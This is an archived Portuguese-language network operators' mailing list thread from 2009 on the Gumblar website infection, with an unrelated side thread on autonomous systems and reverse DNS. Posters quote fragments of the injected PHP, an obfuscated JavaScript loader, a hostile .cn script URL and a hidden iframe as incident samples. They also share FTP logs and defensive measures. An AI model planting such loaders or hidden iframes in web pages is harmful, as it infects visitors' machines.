acesso FTP ao site, esteja comprometida... OBS: Pode ter ocorrido algum bloqueio no sistema de AV ou AS... segue o link: http://eng.registro.br/pipermail/gter/2009-May/023993.html Att, Dilson NOC - Neogrid www.neogrid.com -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Alexandre Gorges Enviada em: segunda-feira, 1 de junho de 2009 15:29 Para: Lista GTER Assunto: Re: [GTER] RES: RES: Virus em sites N?o recebi, talvez foi moderado. Mas vou colocar partes do c?digo, acho que assim n?o ser? moderado, visto que n?o tem fun??o nenhuma. Na programa??o PHP, o c?digo ? parecido com esse: #is?,$s,$a)) foreach($a[0] as $v) if(count(explode(?\n?,$v))>5){ $e=preg_match(?#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#?,$v) || preg_match(?#[\(\[](\s*\d+,)20,}#?,$v); if((preg_match(?#\beval\b#?,$v)&&($e||strpos($v,?fromCharCode?)))||($e&&strp os;($v,?[removed]?)))$s=str_replace($v,?,$s);} $s1=preg_replace(?##?,?,$s); if(stristr($s,?body?)) s="preg_replace(?#(\s*body)#mi?,TMP_XHGFJOKL.?\1?,$s1);elseif(($s1!=">body?) )>?))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl' ])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_statu s(1) as $v)if(($a=$v['name'])==?tmp_lkojfghx?)return;else $s[]=array($a==?default output handler??false:$a); for($i=count($s)-1;$i>=0;$i?){$s[$i][1]=ob_get_contents();ob_end_clean();}ob _start(?tmp_lkojfghx?);for($i=0;$i Na programa??o Java Script, o c?digo ? tipo assim: (?%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9c M75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E?).replace(/TP|NJ n|HY|uvj|dN|Ss|d6K|cM7/g,"")); Ou ent?o uma chamada para um endere?o que carrega o java: http://b.rtbn2.cn/E/J.JS' No uso do iframe, o endere?o varia muito, mas ? algo assim: iframe src="http:%20//%20liteautotoponline%20.cn%20/%20ts%20/%20in.cgi?mozila11" style="visibility: hidden;" height="4" width="2" iframe []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > From: NOC NeoGrid > Reply-To: Lista GTER > Date: Mon, 1 Jun 2009 11:03:49 -0300 > To: Lista GTER > Subject: [GTER] RES: RES: Virus em sites > > Bom dia, > > Mandei um "exemplo" do c?digo para saber se era similar ao que foi encontrado > nos sites de quem iniciou a "thread", mas ningu?m respondeu ( nem que sim, nem > que n?o ). > Seria interessante mostrar o que identificaram nos arquivos, assim evitamos > diversas "possibilidades". > > Att, > > Dilson > NOC - Neogrid > www.neogrid.com > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome > de Julio Arruda > Enviada em: segunda-feira, 1 de junho de 2009 10:47 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: Virus em sites > > Alexandre Gorges wrote: >> Bom dia, Toledo >> >>>> J? foi desconsiderado isso, no servidor n?o tem nenhum usu?rio criado. >>>> Pesquisando pelo malware Gumblar, vi que a senha ? descoberta >>>> na m?quina do usu?rio com spyware. Muitos relatos de senhas >>>> capturadas com quem usa o Filezilla para acesso ao FTP. >>> Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar >>> justamente aqueles clientes que fazem FTP com vc ? infima. >>> Teriam que infectar milhares para encontrar um que hospeda com voc? e que >>> faz ftp. >>> Al?m disso, s?o mais de um cliente seu, o que complica as probabilidade. >>> Imagino que haja um ponto em comum entre eles(clientes). >> >> Mas eu n?o estou dizendo que est? acontecendo apenas comigo. >> Se voc? pesquisar por Gumblar, ir? ver v?rios casos de troca de site por >> FTP. >> De 730 dom?nios, foram infectados aqui 5 sites. E clientes sem rela??o entre >> eles, nem o desenvolvedor dos sites ? o mesmo. >> Um amigo de outro provedor, tamb?m relatou mesmo problema. Para alguns >> clientes apenas. > > Vamos imaginar que somente estes 5 fizeram updates via FTP desde que > houve o problema ? > Isto poderia explicar por que os outros nao foram 'contaminados' ? > Eu sou um pouco paranoico, e se alguem comprometer uma maquina minha, > mesmo que tenha aparencia de ser algo 'periferico' (os arquivos FTP), eu > ao menos daria uma verificada para ver se nao teve algo mais. Obvio que > e' facil para alguem que nao administra isto falar :-), mas... > > Uma outra coisa que voce pode tentar fazer e' dar uma verificada no > trafego deste servidor, ver se nao tem sessoes outgoing dele > 'inesperadas', um tipo de NBA manual :-)..Um outros facil, verificar > trafego para porta tcp 6667 outbound. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter From algorges at gmail.com Mon Jun 1 15:44:01 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Mon, 01 Jun 2009 15:44:01 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_V=EDrus_em_sites?= In-Reply-To: <4A23FF11.7020604@infolink.com.br> Message-ID: ? isso que estou falando a tempo. N?o tem problema no servidor. Os sites s?o alterados via ftp. Nem sempre o problema ? no servidor. :) Segue um peda?o do meu log de FTP. 83.143.81.10 - shine [06/Apr/2009:22:16:19 -0000] "GET /home/sites/cliente.com.br/web/teste/lytebox.js" 200 38957 83.143.81.10 - shine [06/Apr/2009:22:16:24 -0000] "PUT /home/sites/cliente.com.br/web/teste/lytebox.js" 200 38990 83.143.81.10 - shine [06/Apr/2009:22:16:55 -0000] "GET /home/sites/cliente.com.br/web/index.htm" 200 1375 83.143.81.10 - shine [06/Apr/2009:22:16:57 -0000] "PUT /home/sites/cliente.com.br/web/index.htm" 200 1386 Como podem ver, a pessoa puxa o arquivo do site no servidor e logo em seguida coloca o arquivo j? com o script. Como se fosse um echo "script" >> index.htm O script aparece ou no come?o do arquivo ou no final. E volto a dizer, n?o ? feito nada no servidor, n?o foi colocado nenhum arquivo ou script no servidor. Simplesmente ? acesso via FTP e trocado os arquivos. Coloquei o clamav em conjunto com meu servidor de FTP, a cada upload o clamav verifica. Alguns scripts o clamav tem encontrado. Tem dado uma ajuda. []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > From: Marcio Fernandes > Reply-To: Lista GTER > Date: Mon, 01 Jun 2009 13:17:21 -0300 > To: Lista GTER > Subject: Re: [GTER] RES: V?rus em sites > > Realmente, assim como o Juliano, tamb?m experimentamos estes tipos de > eventos por aqui (InfoLink). > > Servidores de hospedagem est?tica, ou seja, sem PHP, ASP, JSP, MySQL, etc. > > Analisando os LOGs de FTP (s?o diversos IPs que fazem acessos > fidedignos, normalmente internacionais: China, Russia, Pol?nia, entre > outros), comprovamos a a??o a informamos aos nossos clientes. > > Logo, a capta??o da senha se d? no lado do cliente, principalmente > quando os mesmos fazem acesso ao FTP atrav?s de cybercaf?s, faculdades, > redes p?blicas, etc. > > []s > Marcio Fernandes > >> >> Cleber, >> >> Sim, vem por FTP, normalmente IP internacional. O problema ocorre com >> sites com HTML, sem nada de PHP, sem permissao de execucao PHP, servidor >> cujo acesso ? realizado apenas pelo cliente, sem furos, sem ser >> shared... sem asp, sem jsp, mysql... ocorreu. >> >> Juliano >> >> Cleber - Listas escreveu: >>> Alexandre, >>> Tem certeza que est? vindo via FTP, pois hoje em dia isso pode ocorrer de >>> maneiras: >>> >>> *) Via FTP mesmo, pois o cliente pode ter um trojan instalado na >>> maquina que >>> fica monitorando e depois quando for transferir uma pagina index ou >>> default, >>> o javascript vai junto (j? ocorreu com cliente nosso) >>> >>> *) Via Upload, alguma pagina ASP ou PHP mal programada aceita o upload >>> de um >>> outro .ASP ou .PHP que se auto propaga em seu servidor nos diret?rios que >>> tem permissao de escrita. >>> >>> Recomenda??o, somente libere escrita para os clientes que o solicitem e >>> tenha um registro em hepldesk, excel ou at? mesmo em papel de p?o :) >>> >>> Se o caso realmente est? vindo via FTP, verifique para fazer bloqueios de >>> IP's e avise seus usu?rios, por exemplo se sabe que o dominio >>> abc.com.br tem >>> acesso NET, fa?a um bloquei para a rede da NET do acesso ao dominio >>> via FTP, >>> ? uma forma de ir isolando o problema e chegar at? a fonte. >>> >>> Espero ter ajudado. >>> >>> Cleber >>> >>> >>> -----Mensagem original----- >>> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em >>> nome de Alexandre Gorges >>> Enviada em: s?bado, 30 de maio de 2009 14:54 >>> Para: Lista GTER >>> Assunto: [GTER] V?rus em sites >>> >>> Boa tarde, >>> Faz alguns 15 dias, que estou com problemas em alguns sites de clientes. >>> N?o sei como ? descoberto a senha de FTP dos sites, mas o acesso sempre ? >>> internacional. ? adicionado um javascript em todas as p?ginas do site >>> do cliente. Alguns >>> antivirus n?o detectam, mas outros como Avast, AVG e Symantec detectam. >>> >>> Algu?m tamb?m est? passando por esse problema? >>> Botei o clamav para verificar o upload dos FTP. Mas infelizmente, o >>> Clamav >>> n?o detecta esse javascript. >>> >>> >>> []'s >>> Alexandre Gorges >>> http://algorges.blogspot.com >>> http://www.dag.eti.br >>> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com >>> >>> >>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> Nenhum v?rus encontrado nessa mensagem recebida. >>> Verificado por AVG - www.avgbrasil.com.br >>> Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de >>> Lan?amento: 05/30/09 05:53:00 >>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > > -- > Cordialmente, > > Marcio Fernandes > InfoLink - Hospedagem UNIX > mfernandes at infolink.com.br > http://dominio.infolink.com.br > -- > gter list https://eng.registro.br/mailman/listinfo/gter From algorges at gmail.com Mon Jun 1 15:45:51 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Mon, 01 Jun 2009 15:45:51 -0300 Subject: [GTER] RES: RES: RES: Virus em sites In-Reply-To: Message-ID: ? isso mesmo Dilson J? vi v?rios com iframe apontado para um endere?o na china. Achei 3 solu??es para varrer o servidor. Uma em bash - http://www.blog.isra3l.net/?p=184 Duas em PHP - http://www.danielansari.com/wordpress/2009/05/automatic-removal-of-gumblarma rtuz-trojan/ http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about -this-injected-script/ []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > From: NOC NeoGrid > Reply-To: Lista GTER > Date: Mon, 1 Jun 2009 15:38:48 -0300 > To: Lista GTER > Subject: [GTER] RES: RES: RES: Virus em sites > > Ol? Alexandre, > > Suspeito fortemente que a m?quina do "cliente" que tem acesso FTP ao site, > esteja comprometida... > > OBS: Pode ter ocorrido algum bloqueio no sistema de AV ou AS... segue o link: > http://eng.registro.br/pipermail/gter/2009-May/023993.html > > Att, > > Dilson > NOC - Neogrid > www.neogrid.com > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome > de Alexandre Gorges > Enviada em: segunda-feira, 1 de junho de 2009 15:29 > Para: Lista GTER > Assunto: Re: [GTER] RES: RES: Virus em sites > > N?o recebi, talvez foi moderado. > > Mas vou colocar partes do c?digo, acho que assim n?o ser? moderado, visto > que n?o tem fun??o nenhuma. > > Na programa??o PHP, o c?digo ? parecido com esse: > > #is?,$s,$a)) > foreach($a[0] as $v) if(count(explode(?\n?,$v))>5){ > $e=preg_match(?#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#?,$v) || > preg_match(?#[\(\[](\s*\d+,)20,}#?,$v); > if((preg_match(?#\beval\b#?,$v)&&($e||strpos($v,?fromCharCode?)))||($e&&strp > os;($v,?[removed]?)))$s=str_replace($v,?,$s);} > $s1=preg_replace(?##?,?,$s); > if(stristr($s,?body?)) > s="preg_replace(?#(\s*body)#mi?,TMP_XHGFJOKL.?\1?,$s1);elseif(($s1!=">body?) > )>?))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function > tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl' > ])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_statu > s(1) as $v)if(($a=$v['name'])==?tmp_lkojfghx?)return;else > $s[]=array($a==?default output handler??false:$a); > for($i=count($s)-1;$i>=0;$i?){$s[$i][1]=ob_get_contents();ob_end_clean();}ob > _start(?tmp_lkojfghx?);for($i=0;$i > > Na programa??o Java Script, o c?digo ? tipo assim: > > (?%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9c > M75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E?).replace(/TP|NJ > n|HY|uvj|dN|Ss|d6K|cM7/g,"")); > > Ou ent?o uma chamada para um endere?o que carrega o java: > > http://b.rtbn2.cn/E/J.JS' > > No uso do iframe, o endere?o varia muito, mas ? algo assim: > > iframe > src="http:%20//%20liteautotoponline%20.cn%20/%20ts%20/%20in.cgi?mozila11" > style="visibility: hidden;" height="4" width="2" iframe > > []'s > Alexandre Gorges > http://algorges.blogspot.com > http://www.dag.eti.br > MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > > > > >> From: NOC NeoGrid >> Reply-To: Lista GTER >> Date: Mon, 1 Jun 2009 11:03:49 -0300 >> To: Lista GTER >> Subject: [GTER] RES: RES: Virus em sites >> >> Bom dia, >> >> Mandei um "exemplo" do c?digo para saber se era similar ao que foi encontrado >> nos sites de quem iniciou a "thread", mas ningu?m respondeu ( nem que sim, >> nem >> que n?o ). >> Seria interessante mostrar o que identificaram nos arquivos, assim evitamos >> diversas "possibilidades". >> >> Att, >> >> Dilson >> NOC - Neogrid >> www.neogrid.com >> >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em >> nome >> de Julio Arruda >> Enviada em: segunda-feira, 1 de junho de 2009 10:47 >> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> Assunto: Re: [GTER] RES: Virus em sites >> >> Alexandre Gorges wrote: >>> Bom dia, Toledo >>> >>>>> J? foi desconsiderado isso, no servidor n?o tem nenhum usu?rio criado. >>>>> Pesquisando pelo malware Gumblar, vi que a senha ? descoberta >>>>> na m?quina do usu?rio com spyware. Muitos relatos de senhas >>>>> capturadas com quem usa o Filezilla para acesso ao FTP. >>>> Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar >>>> justamente aqueles clientes que fazem FTP com vc ? infima. >>>> Teriam que infectar milhares para encontrar um que hospeda com voc? e que >>>> faz ftp. >>>> Al?m disso, s?o mais de um cliente seu, o que complica as probabilidade. >>>> Imagino que haja um ponto em comum entre eles(clientes). >>> >>> Mas eu n?o estou dizendo que est? acontecendo apenas comigo. >>> Se voc? pesquisar por Gumblar, ir? ver v?rios casos de troca de site por >>> FTP. >>> De 730 dom?nios, foram infectados aqui 5 sites. E clientes sem rela??o entre >>> eles, nem o desenvolvedor dos sites ? o mesmo. >>> Um amigo de outro provedor, tamb?m relatou mesmo problema. Para alguns >>> clientes apenas. >> >> Vamos imaginar que somente estes 5 fizeram updates via FTP desde que >> houve o problema ? >> Isto poderia explicar por que os outros nao foram 'contaminados' ? >> Eu sou um pouco paranoico, e se alguem comprometer uma maquina minha, >> mesmo que tenha aparencia de ser algo 'periferico' (os arquivos FTP), eu >> ao menos daria uma verificada para ver se nao teve algo mais. Obvio que >> e' facil para alguem que nao administra isto falar :-), mas... >> >> Uma outra coisa que voce pode tentar fazer e' dar uma verificada no >> trafego deste servidor, ver se nao tem sessoes outgoing dele >> 'inesperadas', um tipo de NBA manual :-)..Um outros facil, verificar >> trafego para porta tcp 6667 outbound. >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From Bruno at Openline.com.br Mon Jun 1 15:59:49 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Mon, 01 Jun 2009 15:59:49 -0300 Subject: [GTER] SA - Sistema Autonomo Message-ID: <1243882789550.Bruno@Openline.com.br> --- filipe mendes escreveu: > Eu recebi meu AS ha uns 2 meses e estou numa eterna luta para publica-los > nas operadoras tb.. Na OI eu nunca consegui. Na EBT e Intelig, razoavelmente f?cil. Na CTBC, demora um pouco mas ? possivel sim. Na Telef nunca tentei (O caso da OI merece uma reclama??o formal do CGI, pois eles n?o querem fazer MESMO) []s, !3runo > 2009/6/1 Alfredo Dal?Ava J?nior > > - Faltou mais um requisito: ter muuuita paci?ncia e ligar para os > > consultores e 0800 das operadoras 2 vezes por dia... > > Eu mesmo estou fazendo isso a mais de 45 dias e at? agora nada... From itamar at ispbrasil.com.br Mon Jun 1 15:20:17 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Mon, 1 Jun 2009 15:20:17 -0300 Subject: [GTER] RES: SA - Sistema Autonomo In-Reply-To: <4A23F03C.15A6.0046.0@trf3.jus.br> References: <1243853767904.bruno@openline.com.br> <6A47709462534849BDCE531DE04758B1@INETWEB.local> <4A23FD77.9000207@cyberweb.com.br> <4A23F03C.15A6.0046.0@trf3.jus.br> Message-ID: a ctbc por exemplo n?o delega o dns de acordo com a rfc2317 de jeito nenhum. 2009/6/1 MARLON BORBA : > Isso para n?o falar da estabilidade das configura??es: voc? n?o precisa > ajustar DNS (direto e reverso), modificar o seu cadastro no Registro > .br, etc?tera e tal. Livra-se de um belo trabalho burocr?tico (por > exemplo, se seu bloco ? menor do que um /26, voc? precisa aplicar a RFC > 2317 e pedir pelo-amor-de-Deus para a sua operadora fazer as altera??es > no DNS reverso nela, o que, dependendo da empresa, pode ser um parto). > > > -- > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio ? Seguran?a da Informa??o > Comiss?o Local de Resposta a Incidentes - CLRI > TRF 3 Regi?o > (11) 3012-1581 ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From fernando at bluesolutions.com.br Mon Jun 1 16:00:18 2009 From: fernando at bluesolutions.com.br (Fernando Ulisses dos Santos) Date: Mon, 01 Jun 2009 16:00:18 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_V=EDrus_em_sites?= In-Reply-To: References: Message-ID: <4A242542.8070701@bluesolutions.com.br> Alexandre, Realmente, depois que voc? quantificou 5 usu?rios em um universo de 700, podemos voltar o foco para infec??o com v?rus nos clientes. At? ent?o, sem a quantidade de usu?rios definidas, imaginava que fosse uma porcentagem significativa da sua base de usu?rios. Pela velocidade reportada nos logs, tudo indica que ? parte de uma botnet, procurando infectar novas m?quinas. Voc? pode fazer uma busca nos logs procurando esse padr?o de comportamento, baixar e subir o mesmo arquivo em poucos segundos, n?o ? dif?cil de fazer um script pra isso. Fernando Ulisses dos Santos Blue Solutions - Solu??es em TI 19-3321-9068 / 11-4062-9218 fernando at bluesolutions.com.br Em 01-06-2009 15:44, Alexandre Gorges escreveu: > ? isso que estou falando a tempo. > N?o tem problema no servidor. Os sites s?o alterados via ftp. > Nem sempre o problema ? no servidor. :) > > Segue um peda?o do meu log de FTP. > > 83.143.81.10 - shine [06/Apr/2009:22:16:19 -0000] "GET > /home/sites/cliente.com.br/web/teste/lytebox.js" 200 38957 > 83.143.81.10 - shine [06/Apr/2009:22:16:24 -0000] "PUT > /home/sites/cliente.com.br/web/teste/lytebox.js" 200 38990 > 83.143.81.10 - shine [06/Apr/2009:22:16:55 -0000] "GET > /home/sites/cliente.com.br/web/index.htm" 200 1375 > 83.143.81.10 - shine [06/Apr/2009:22:16:57 -0000] "PUT > /home/sites/cliente.com.br/web/index.htm" 200 1386 > > Como podem ver, a pessoa puxa o arquivo do site no servidor e logo em > seguida coloca o arquivo j? com o script. > > Como se fosse um echo "script" >> index.htm > > O script aparece ou no come?o do arquivo ou no final. > > E volto a dizer, n?o ? feito nada no servidor, n?o foi colocado nenhum > arquivo ou script no servidor. Simplesmente ? acesso via FTP e trocado os > arquivos. > > Coloquei o clamav em conjunto com meu servidor de FTP, a cada upload o > clamav verifica. Alguns scripts o clamav tem encontrado. Tem dado uma ajuda. > > []'s > Alexandre Gorges > http://algorges.blogspot.com > http://www.dag.eti.br > MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > > > > > >> From: Marcio Fernandes >> Reply-To: Lista GTER >> Date: Mon, 01 Jun 2009 13:17:21 -0300 >> To: Lista GTER >> Subject: Re: [GTER] RES: V?rus em sites >> >> Realmente, assim como o Juliano, tamb?m experimentamos estes tipos de >> eventos por aqui (InfoLink). >> >> Servidores de hospedagem est?tica, ou seja, sem PHP, ASP, JSP, MySQL, etc. >> >> Analisando os LOGs de FTP (s?o diversos IPs que fazem acessos >> fidedignos, normalmente internacionais: China, Russia, Pol?nia, entre >> outros), comprovamos a a??o a informamos aos nossos clientes. >> >> Logo, a capta??o da senha se d? no lado do cliente, principalmente >> quando os mesmos fazem acesso ao FTP atrav?s de cybercaf?s, faculdades, >> redes p?blicas, etc. >> >> []s >> Marcio Fernandes >> >> >>> Cleber, >>> >>> Sim, vem por FTP, normalmente IP internacional. O problema ocorre com >>> sites com HTML, sem nada de PHP, sem permissao de execucao PHP, servidor >>> cujo acesso ? realizado apenas pelo cliente, sem furos, sem ser >>> shared... sem asp, sem jsp, mysql... ocorreu. >>> >>> Juliano >>> >>> Cleber - Listas escreveu: >>> >>>> Alexandre, >>>> Tem certeza que est? vindo via FTP, pois hoje em dia isso pode ocorrer de >>>> maneiras: >>>> >>>> *) Via FTP mesmo, pois o cliente pode ter um trojan instalado na >>>> maquina que >>>> fica monitorando e depois quando for transferir uma pagina index ou >>>> default, >>>> o javascript vai junto (j? ocorreu com cliente nosso) >>>> >>>> *) Via Upload, alguma pagina ASP ou PHP mal programada aceita o upload >>>> de um >>>> outro .ASP ou .PHP que se auto propaga em seu servidor nos diret?rios que >>>> tem permissao de escrita. >>>> >>>> Recomenda??o, somente libere escrita para os clientes que o solicitem e >>>> tenha um registro em hepldesk, excel ou at? mesmo em papel de p?o :) >>>> >>>> Se o caso realmente est? vindo via FTP, verifique para fazer bloqueios de >>>> IP's e avise seus usu?rios, por exemplo se sabe que o dominio >>>> abc.com.br tem >>>> acesso NET, fa?a um bloquei para a rede da NET do acesso ao dominio >>>> via FTP, >>>> ? uma forma de ir isolando o problema e chegar at? a fonte. >>>> >>>> Espero ter ajudado. >>>> >>>> Cleber >>>> >>>> >>>> -----Mensagem original----- >>>> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em >>>> nome de Alexandre Gorges >>>> Enviada em: s?bado, 30 de maio de 2009 14:54 >>>> Para: Lista GTER >>>> Assunto: [GTER] V?rus em sites >>>> >>>> Boa tarde, >>>> Faz alguns 15 dias, que estou com problemas em alguns sites de clientes. >>>> N?o sei como ? descoberto a senha de FTP dos sites, mas o acesso sempre ? >>>> internacional. ? adicionado um javascript em todas as p?ginas do site >>>> do cliente. Alguns >>>> antivirus n?o detectam, mas outros como Avast, AVG e Symantec detectam. >>>> >>>> Algu?m tamb?m est? passando por esse problema? >>>> Botei o clamav para verificar o upload dos FTP. Mas infelizmente, o >>>> Clamav >>>> n?o detecta esse javascript. >>>> >>>> >>>> []'s >>>> Alexandre Gorges >>>> http://algorges.blogspot.com >>>> http://www.dag.eti.br >>>> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com >>>> >>>> >>>> >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> Nenhum v?rus encontrado nessa mensagem recebida. >>>> Verificado por AVG - www.avgbrasil.com.br >>>> Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de >>>> Lan?amento: 05/30/09 05:53:00 >>>> >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> -- >> Cordialmente, >> >> Marcio Fernandes >> InfoLink - Hospedagem UNIX >> mfernandes at infolink.com.br >> http://dominio.infolink.com.br >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From mfernandes at infolink.com.br Mon Jun 1 16:42:27 2009 From: mfernandes at infolink.com.br (Marcio Fernandes) Date: Mon, 01 Jun 2009 16:42:27 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_V=EDrus_em_sites?= In-Reply-To: References: Message-ID: <4A242F23.9070900@infolink.com.br> Alexandre, N?o sei qual a natureza do seu acesso e nem o perfil de seu cliente, mas uma id?ia ? bloquear portas de FTP para origens que n?o sejam de seu interesse. Por exemplo, se voc? n?o tem clientes da Russia, China, Pol?nia e correlatos, uma id?ia ? bloquear esse pessoal. Repito, n?o sei se isso atrapalharia o perfil de seus clientes, mas pode ajudar na hora do tiroteio. []s Marcio Fernandes > ? isso que estou falando a tempo. > N?o tem problema no servidor. Os sites s?o alterados via ftp. > Nem sempre o problema ? no servidor. :) > > Segue um peda?o do meu log de FTP. > > 83.143.81.10 - shine [06/Apr/2009:22:16:19 -0000] "GET > /home/sites/cliente.com.br/web/teste/lytebox.js" 200 38957 > 83.143.81.10 - shine [06/Apr/2009:22:16:24 -0000] "PUT > /home/sites/cliente.com.br/web/teste/lytebox.js" 200 38990 > 83.143.81.10 - shine [06/Apr/2009:22:16:55 -0000] "GET > /home/sites/cliente.com.br/web/index.htm" 200 1375 > 83.143.81.10 - shine [06/Apr/2009:22:16:57 -0000] "PUT > /home/sites/cliente.com.br/web/index.htm" 200 1386 > > Como podem ver, a pessoa puxa o arquivo do site no servidor e logo em > seguida coloca o arquivo j? com o script. > > Como se fosse um echo "script" >> index.htm > > O script aparece ou no come?o do arquivo ou no final. > > E volto a dizer, n?o ? feito nada no servidor, n?o foi colocado nenhum > arquivo ou script no servidor. Simplesmente ? acesso via FTP e trocado os > arquivos. > > Coloquei o clamav em conjunto com meu servidor de FTP, a cada upload o > clamav verifica. Alguns scripts o clamav tem encontrado. Tem dado uma ajuda. > > []'s > Alexandre Gorges > http://algorges.blogspot.com > http://www.dag.eti.br > MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > > > > >> From: Marcio Fernandes >> Reply-To: Lista GTER >> Date: Mon, 01 Jun 2009 13:17:21 -0300 >> To: Lista GTER >> Subject: Re: [GTER] RES: V?rus em sites >> >> Realmente, assim como o Juliano, tamb?m experimentamos estes tipos de >> eventos por aqui (InfoLink). >> >> Servidores de hospedagem est?tica, ou seja, sem PHP, ASP, JSP, MySQL, etc. >> >> Analisando os LOGs de FTP (s?o diversos IPs que fazem acessos >> fidedignos, normalmente internacionais: China, Russia, Pol?nia, entre >> outros), comprovamos a a??o a informamos aos nossos clientes. >> >> Logo, a capta??o da senha se d? no lado do cliente, principalmente >> quando os mesmos fazem acesso ao FTP atrav?s de cybercaf?s, faculdades, >> redes p?blicas, etc. >> >> []s >> Marcio Fernandes >> >>> Cleber, >>> >>> Sim, vem por FTP, normalmente IP internacional. O problema ocorre com >>> sites com HTML, sem nada de PHP, sem permissao de execucao PHP, servidor >>> cujo acesso ? realizado apenas pelo cliente, sem furos, sem ser >>> shared... sem asp, sem jsp, mysql... ocorreu. >>> >>> Juliano >>> >>> Cleber - Listas escreveu: >>>> Alexandre, >>>> Tem certeza que est? vindo via FTP, pois hoje em dia isso pode ocorrer de >>>> maneiras: >>>> >>>> *) Via FTP mesmo, pois o cliente pode ter um trojan instalado na >>>> maquina que >>>> fica monitorando e depois quando for transferir uma pagina index ou >>>> default, >>>> o javascript vai junto (j? ocorreu com cliente nosso) >>>> >>>> *) Via Upload, alguma pagina ASP ou PHP mal programada aceita o upload >>>> de um >>>> outro .ASP ou .PHP que se auto propaga em seu servidor nos diret?rios que >>>> tem permissao de escrita. >>>> >>>> Recomenda??o, somente libere escrita para os clientes que o solicitem e >>>> tenha um registro em hepldesk, excel ou at? mesmo em papel de p?o :) >>>> >>>> Se o caso realmente est? vindo via FTP, verifique para fazer bloqueios de >>>> IP's e avise seus usu?rios, por exemplo se sabe que o dominio >>>> abc.com.br tem >>>> acesso NET, fa?a um bloquei para a rede da NET do acesso ao dominio >>>> via FTP, >>>> ? uma forma de ir isolando o problema e chegar at? a fonte. >>>> >>>> Espero ter ajudado. >>>> >>>> Cleber >>>> >>>> >>>> -----Mensagem original----- >>>> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em >>>> nome de Alexandre Gorges >>>> Enviada em: s?bado, 30 de maio de 2009 14:54 >>>> Para: Lista GTER >>>> Assunto: [GTER] V?rus em sites >>>> >>>> Boa tarde, >>>> Faz alguns 15 dias, que estou com problemas em alguns sites de clientes. >>>> N?o sei como ? descoberto a senha de FTP dos sites, mas o acesso sempre ? >>>> internacional. ? adicionado um javascript em todas as p?ginas do site >>>> do cliente. Alguns >>>> antivirus n?o detectam, mas outros como Avast, AVG e Symantec 